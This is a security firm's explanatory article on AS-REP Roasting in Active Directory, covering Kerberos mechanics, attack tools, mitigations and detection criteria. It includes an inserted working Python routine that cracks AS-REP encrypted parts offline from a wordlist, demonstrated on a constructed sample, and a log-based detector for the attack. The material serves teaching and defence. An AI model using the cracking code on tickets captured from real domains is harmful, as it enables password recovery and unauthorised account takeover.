Redbot Security

AS-REP Roasting: Exploiting Kerberos for Password Hashes


What is AS-REP Roasting? AS-REP Roasting is a Kerberos attack against user accounts that have pre-authentication disabled. An adversary sends an AS-REQ for such an account without any pre-authentication data, receives an AS-REP whose encrypted part is protected with a key derived from the user's password, and brute-forces that encrypted blob offline to recover the clear-text password. The domain controller still logs the ticket request (Event ID 4768), but no failed-logon events are generated and the cracking itself never touches the network.

In recent years, attackers have increasingly targeted the authentication mechanisms of Windows environments. Kerberos Authentication Service Response (AS-REP) Roasting, a close relative of Kerberoasting, has become a standard method for compromising Active Directory (AD) credentials.

This article provides an in-depth analysis of AS-REP Roasting, the tools attackers commonly employ, and effective mitigation strategies to defend against this threat.

Pre-authentication risk

AS-REP Roasting targets accounts where Kerberos pre-authentication is disabled.

Offline hash cracking

Attackers can retrieve the encrypted AS-REP for such an account and crack it offline, recovering the account's clear-text password.

Active Directory exposure

The attack can reveal credential weaknesses that support broader domain compromise.

Why AS-REP Roasting matters in real penetration tests

AS-REP Roasting is one of the identity-layer weaknesses that can support broader Active Directory compromise. Redbot validates these paths through penetration testing services and network penetration testing, where testers look for credential exposure, privilege escalation, and real attack paths.

Teams evaluating providers can also compare service models in our penetration testing companies directory.

Understanding AS-REP Roasting

AS-REP Roasting targets the Kerberos authentication protocol, the default authentication mechanism in Microsoft's Active Directory, used to authenticate users and services within a Windows domain. It abuses a configuration weakness rather than a protocol flaw: when pre-authentication is disabled on an account, the KDC will issue an AS-REP to anyone who asks for one, and part of that response is encrypted with a key derived from the user's password, so it can be attacked offline.

Pre-authentication is a Kerberos control that requires the client to prove knowledge of the user's key before the KDC issues anything: the AS-REQ must carry a timestamp encrypted with that key (PA-ENC-TIMESTAMP). Some accounts, typically legacy service accounts or accounts used by non-Windows Kerberos clients, have it disabled through the "Do not require Kerberos preauthentication" setting (the DONT_REQ_PREAUTH flag, 0x400000, in userAccountControl). An attacker exploits this by sending an AS-REQ for such a user with no pre-authentication data at all.

The domain controller answers with an AS-REP containing the TGT (encrypted with the krbtgt key, useless to the attacker) and an enc-part encrypted with the user's long-term key, which for RC4-HMAC is the NT hash of the password. The response does not contain the hash itself; what the attacker takes offline is the encrypted enc-part, and each password guess is tested by deriving a key from it and checking whether the blob decrypts and verifies. Protocol-wise, Kerberoasting involves both exchanges, AS-REQ/AS-REP to obtain a TGT and then TGS-REQ/TGS-REP to obtain a service ticket encrypted with the service account's key, whereas AS-REP Roasting involves ONLY AS-REQ/AS-REP: it needs just the authentication service response and never requests a service ticket.
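The following is an added example, not code from the article, Impacket, Rubeus or hashcat. It re-implements just enough of RFC 4757 (RC4-HMAC, etype 23) in pure Python to show why a captured AS-REP can be brute-forced offline: the enc-part is encrypted under K3, which is derived from the user's NT hash (MD4 of the UTF-16LE password) and the transmitted checksum, so each candidate password can be tested without touching the domain controller. The user name, realm, password and the plaintext standing in for the DER EncASRepPart are all constructed here; a real `$krb5asrep$23$...` line would come from GetNPUsers.py or Rubeus.

```python
import hmac
import os
import struct
from hashlib import md5

MASK = 0xFFFFFFFF
KEY_USAGE_AS_REP_ENC_PART = 8   # RFC 4120 key usage number for the AS-REP enc-part

def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python: OpenSSL 3 builds of hashlib usually
    refuse 'md4', and the NT hash is MD4 of the UTF-16LE password."""
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, message word order, shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, w in enumerate(order):
                a = _rot((a + fn(b, c, d) + words[w] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c          # registers take turns: A, D, C, B
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = b"") -> bytes:
    """RFC 4757 encryption: checksum(16) || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    body = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, body)
    return checksum + rc4(_hmac_md5(k1, checksum), body)

def rc4_hmac_verify(key: bytes, usage: int, edata: bytes) -> bool:
    """Decrypt with a candidate key and check the HMAC: True iff the key is right."""
    checksum, cipher = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    body = rc4(_hmac_md5(k1, checksum), cipher)
    return hmac.compare_digest(_hmac_md5(k1, body), checksum)

def to_hashcat(user: str, realm: str, edata: bytes) -> str:
    """The line GetNPUsers.py / Rubeus emit for hashcat -m 18200 (etype 23)."""
    return f"$krb5asrep$23${user}@{realm}:{edata[:16].hex()}${edata[16:].hex()}"

def crack_asrep(line: str, wordlist) -> "str | None":
    """Offline brute force: derive an NT hash from each candidate and test it."""
    head, rest = line.split(":", 1)
    if not head.startswith("$krb5asrep$23$"):
        raise ValueError("only RC4-HMAC (etype 23) AS-REPs are handled here")
    checksum_hex, cipher_hex = rest.split("$", 1)
    edata = bytes.fromhex(checksum_hex) + bytes.fromhex(cipher_hex)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KEY_USAGE_AS_REP_ENC_PART, edata):
            return candidate
    return None

def build_sample_asrep(user="svc_legacy", realm="CORP.LOCAL", password="Winter2023!") -> str:
    """CONSTRUCTED stand-in for a captured AS-REP: the plaintext is a placeholder
    for the DER-encoded EncASRepPart a DC returns, but it is encrypted exactly as
    a DC would encrypt it, under the user's NT hash with key usage 8."""
    placeholder_enc_part = b"<EncASRepPart: session key, times, sname>"
    edata = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_AS_REP_ENC_PART, placeholder_enc_part)
    return to_hashcat(user, realm, edata)

if __name__ == "__main__":
    captured = build_sample_asrep()
    print(captured)
    print("cracked:", crack_asrep(captured, ["Summer2022!", "Password1", "Winter2023!"]))
```

Note the asymmetry that makes the attack cheap: the KDC does one MD4 and three HMAC-MD5 operations to build the response, and the attacker needs the same amount of work per guess, with no lockout and no further network traffic. hashcat short-circuits this by checking only the leading DER bytes of the decrypted enc-part rather than the full HMAC, which is why RC4 AS-REPs crack so quickly; the full-checksum verification here is the rigorous form.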

Organizations looking to identify these weaknesses proactively should incorporate penetration testing services that specifically evaluate Active Directory attack paths and credential exposure risks.

Tools Employed by Attackers

Several tools are commonly used by attackers to perform AS-REP Roasting attacks:

Rubeus

A post-exploitation toolkit for interacting with Kerberos from a Windows host. Its asreproast action locates accounts with pre-authentication disabled and requests an AS-REP for each, emitting the encrypted part in hashcat or John the Ripper format for offline cracking.

Impacket

A collection of Python classes and example scripts for working with network protocols. GetNPUsers.py performs AS-REP Roasting: given a list of usernames (no credentials needed) or a set of domain credentials (it then enumerates vulnerable accounts over LDAP), it requests AS-REPs and prints the encrypted material in John or hashcat format.

CrackMapExec

A network assessment tool that automates many post-exploitation tasks; its LDAP module's --asreproast option requests AS-REPs for accounts with pre-authentication disabled and writes them to a file. It does not crack them itself: the output is fed to hashcat or John the Ripper.

Mimikatz

Although primarily known for its credential dumping capabilities, Mimikatz can also be used to perform AS-REP Roasting attacks.

Example of AS-REP Roasting

The attack can be run in two ways. The first is unauthenticated and needs nothing but candidate usernames: an AS-REQ without pre-authentication data is sent for each name, and the KDC's reply tells the attacker both whether the account exists and whether it is roastable (KDC_ERR_C_PRINCIPAL_UNKNOWN for an unknown user, KDC_ERR_PREAUTH_REQUIRED for a valid user with pre-authentication enforced, and a full AS-REP for a valid user with it disabled). A list of common names is therefore enough to enumerate usernames and harvest AS-REPs from outside the domain.

A concrete representation of this concept can be observed in Figure 1, wherein the developers of CrackMapExec provide an example of an AS-REP Roasting attack.

Figure 1: Unauthenticated AS-REP Roasting

The second method is authenticated. With any valid domain credentials, the attacker queries LDAP for accounts whose userAccountControl has the DONT_REQ_PREAUTH bit set and requests an AS-REP for each of them, so no username guessing is needed and every vulnerable account in the domain is found. Figure 2 shows the output of such an authenticated run.

Figure 2: Authenticated AS-REP Roasting

Mitigation Techniques

To defend against AS-REP Roasting attacks and similar Kerberoasting techniques, organizations should implement a combination of proactive measures and monitoring practices:

Enable Pre-Authentication

Enforce pre-authentication on every account, including service accounts. Audit regularly for the DONT_REQ_PREAUTH flag (the DoesNotRequirePreAuth property in the ActiveDirectory PowerShell module), and treat any account that genuinely needs it disabled as a documented exception with a long, random password. This removes the condition AS-REP Roasting depends on.

Implement Credential Hygiene

Enforce strong password length and complexity, and rotate the passwords of service accounts and privileged users on a schedule (or move service accounts to group Managed Service Accounts where possible). A captured AS-REP is only useful if its password can be cracked before it is changed; long random passwords make that infeasible.

Monitor Event Logs

Monitor domain controller security logs for Kerberos authentication ticket requests (Event ID 4768) with a Pre-Authentication Type of 0, which Windows records only when an AS-REP was issued without pre-authentication, and for bursts of such requests, or of unknown-principal and pre-authentication-required failures, from a single source address. These are the direct footprint of AS-REP Roasting and of the username enumeration that precedes an unauthenticated run.

Network Segmentation

Segmenting the network can limit lateral movement for attackers. Restricting access to sensitive systems reduces the potential impact of an AS-REP Roasting attack.

Use Intrusion Detection Systems

Deploy IDS solutions capable of detecting Kerberoasting attempts. These systems can raise alerts when abnormal ticket requests are detected.


AS-REP Roasting Detection Criteria

The following criteria identify AS-REP Roasting in the Windows Security event log on domain controllers. The defining combination is a successful Kerberos authentication ticket request (Event ID 4768) whose Pre-Authentication Type is 0, which Windows logs only when an AS-REP was issued without pre-authentication; a normal password logon shows type 2 (PA-ENC-TIMESTAMP).

Event ID: 4768 and 4625

Pre-Authentication Type: 0 (logon without pre-authentication)

Ticket Encryption Type: 0x17 (RC4-HMAC, which the tools request by default because it cracks fastest; 0x12 or 0x11 appears if AES was requested instead)

Ticket Options: 0x5080000 (varies by tool, so do not rely on this field alone)

Service Name: krbtgt
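An added example, not from the article and not a vendor rule set, applying these criteria to constructed 4768 records. The per-event rule is the one listed above (4768, service krbtgt, Pre-Authentication Type 0, RC4 flagged highest); the two correlation heuristics, a sweep of several accounts from one source and a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) / KDC_ERR_PREAUTH_REQUIRED (0x19) result codes that matches the username enumeration of an unauthenticated run, are my additions. The records are constructed dicts using the EventData field names of the real event; thresholds and the window are assumptions to tune per environment.

```python
from collections import defaultdict

# 4768 Result Codes produced by unauthenticated probing with guessed usernames
KDC_FAILURES = {"0x6": "KDC_ERR_C_PRINCIPAL_UNKNOWN", "0x19": "KDC_ERR_PREAUTH_REQUIRED"}

def is_asrep_roast(ev):
    """Per-event rule from the criteria above. Returns a severity or None.
    PreAuthType 0 means the AS-REP was issued without pre-authentication;
    RC4 (0x17) is what the tools request by default, AES (0x12/0x11) only
    if the attacker asked for it, so AES is flagged one notch lower."""
    if ev["EventID"] != 4768 or ev["ServiceName"].lower() != "krbtgt":
        return None
    if ev["Status"] != "0x0" or ev["PreAuthType"] != 0:
        return None
    return "high" if ev["TicketEncryptionType"] == "0x17" else "medium"

def analyze(events, sweep_threshold=3, enum_threshold=5, window=60):
    """Run the per-event rule plus two correlation heuristics over 4768 records.
    Returns a list of (severity, description) alerts."""
    alerts = []
    roasted = defaultdict(set)     # IpAddress -> accounts that received a no-pre-auth AS-REP
    failures = defaultdict(list)   # IpAddress -> times of 0x6/0x19 replies inside the window
    for ev in sorted(events, key=lambda e: e["Time"]):
        sev = is_asrep_roast(ev)
        if sev:
            alerts.append((sev, f"AS-REP without pre-auth for {ev['TargetUserName']} "
                                f"from {ev['IpAddress']} (etype {ev['TicketEncryptionType']})"))
            roasted[ev["IpAddress"]].add(ev["TargetUserName"])
        elif ev["EventID"] == 4768 and ev["Status"] in KDC_FAILURES:
            recent = [t for t in failures[ev["IpAddress"]] if ev["Time"] - t <= window] + [ev["Time"]]
            failures[ev["IpAddress"]] = recent
            if len(recent) == enum_threshold:   # fire once, as the sliding window fills
                alerts.append(("medium", f"{ev['IpAddress']}: {enum_threshold} unknown-principal / "
                                         f"pre-auth-required replies within {window}s, possible username enumeration"))
    for ip, users in roasted.items():
        if len(users) >= sweep_threshold:
            alerts.append(("high", f"{ip} obtained no-pre-auth AS-REPs for {len(users)} accounts: "
                                   + ", ".join(sorted(users))))
    return alerts

def _ev(t, user, ip, status="0x0", etype="0x17", preauth=0):
    """CONSTRUCTED 4768 record. On failures Windows logs etype 0xffffffff and
    Pre-Authentication Type '-', which is mirrored here."""
    return {"EventID": 4768, "Time": t, "TargetUserName": user, "ServiceName": "krbtgt",
            "Status": status, "IpAddress": ip,
            "TicketEncryptionType": etype if status == "0x0" else "0xffffffff",
            "PreAuthType": preauth if status == "0x0" else "-"}

def sample_events():
    """CONSTRUCTED log: one normal logon, an enumeration burst, a roasting sweep, one AES roast."""
    events = [_ev(0, "alice", "10.0.0.5", etype="0x12", preauth=2)]          # normal, pre-auth type 2
    for i, name in enumerate(["admin", "backup", "root", "jsmith", "test"]):  # guessed names
        events.append(_ev(10 + i, name, "10.0.0.99", status="0x6" if i < 3 else "0x19"))
    for i, name in enumerate(["svc_legacy", "svc_backup", "svc_sql"]):        # roasted accounts
        events.append(_ev(20 + i, name, "10.0.0.99"))
    events.append(_ev(30, "svc_old", "10.0.0.7", etype="0x12"))              # AES requested
    return events

if __name__ == "__main__":
    for severity, text in analyze(sample_events()):
        print(f"[{severity}] {text}")
```

The benign logon for alice never matches because its Pre-Authentication Type is 2, not 0, even though it also targets krbtgt. Ticket Options is deliberately not part of the rule: the value differs between Rubeus, Impacket and other clients, so keying on it creates blind spots.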

Why AS-REP Roasting Matters in Real Attacks

AS-REP Roasting is rarely the end goal of an attacker. Instead, it is often used as an initial foothold to recover credentials that can be reused across systems, escalated into privileged access, or leveraged for lateral movement within Active Directory environments.

In real-world penetration testing scenarios, recovered credentials from AS-REP Roasting frequently expose weak service accounts, reused passwords, or privileged users. These weaknesses can lead to broader domain compromise when combined with other attack techniques.

This is why AS-REP Roasting is commonly identified during penetration testing services and deeper network penetration testing, where testers validate how credential exposure translates into real attack paths.

Conclusion

AS-REP Roasting is a simple but effective attack that abuses a Kerberos configuration weakness, letting attackers recover user passwords from encrypted responses the domain controller hands out to anyone who asks. Understanding the mechanics of AS-REP Roasting and the tools attackers use is crucial for building effective defenses.

By implementing a combination of technical measures, security best practices, and proactive monitoring, organizations can significantly reduce the risk of falling victim to AS-REP Roasting and similar authentication-based attacks. Regular security assessments and staying informed about emerging threats are also essential components of a robust cybersecurity strategy.

More Information on Kerberos Authentication

https://www.tarlogic.com/blog/how-kerberos-works/

About the Author

This article was written by the Redbot Security Team and reflects real-world observations from hands-on security testing, Active Directory attack path analysis, and credential exposure validation.

Need to test Active Directory attack paths?

Redbot Security helps organizations identify credential exposure, Kerberos weaknesses, privilege escalation paths, and real-world network compromise scenarios through senior-led manual penetration testing.